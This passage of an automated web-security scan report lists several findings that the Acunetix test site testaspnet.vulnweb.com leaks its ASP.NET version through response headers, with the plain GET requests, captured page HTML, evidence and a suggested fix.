          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        4. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        5. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
